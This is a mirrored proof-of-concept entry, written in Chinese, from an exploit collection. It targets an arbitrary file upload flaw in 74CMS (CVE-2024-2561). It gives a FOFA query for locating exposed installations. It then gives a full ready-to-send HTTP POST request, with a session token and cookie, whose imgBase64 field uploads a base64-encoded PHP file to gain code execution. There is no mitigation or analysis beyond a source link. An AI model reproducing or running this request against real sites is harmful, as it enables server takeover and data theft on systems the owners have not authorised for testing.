mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
44 lines
1.9 KiB
Markdown
44 lines
1.9 KiB
Markdown
# 74CMS存在任意文件上传漏洞(CVE-2024-2561)
|
||
|
||
74CMS存在任意文件上传漏洞(CVE-2024-2561),漏洞地址存在与sendCompanyLogo文件中/controller/company/Index.php#sendCompanyLogo的组件Company Logo Handler。经修改后的参数:imgBase64恶意代码输入可导致rce。
|
||
|
||
## fofa
|
||
|
||
```javascript
|
||
app="骑士-74CMS"
|
||
```
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
POST /v1_0/company/index/sendCompanyLogo HTTP/1.1
|
||
Host: localhost:7888
|
||
Cache-Control: max-age=0
|
||
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
|
||
sec-ch-ua-mobile: ?0
|
||
sec-ch-ua-platform: "macOS"
|
||
Upgrade-Insecure-Requests: 1
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
|
||
user-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||
Sec-Fetch-Site: same-origin
|
||
Sec-Fetch-Mode: navigate
|
||
Sec-Fetch-User: ?1
|
||
Sec-Fetch-Dest: document
|
||
Accept-Encoding: gzip, deflate
|
||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||
Cookie: qscms_visitor=%7B%22utype%22%3A1%2C%22mobile%22%3A%2215212345678%22%2C%22token%22%3A%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ%22%7D
|
||
Connection: close
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 56
|
||
|
||
imgBase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
|
||
```
|
||
|
||
|
||
|
||
|
||
|
||
## 漏洞来源
|
||
|
||
- https://gist.github.com/Southseast/9f5284d8ee0f6d91e72eef73b285512a |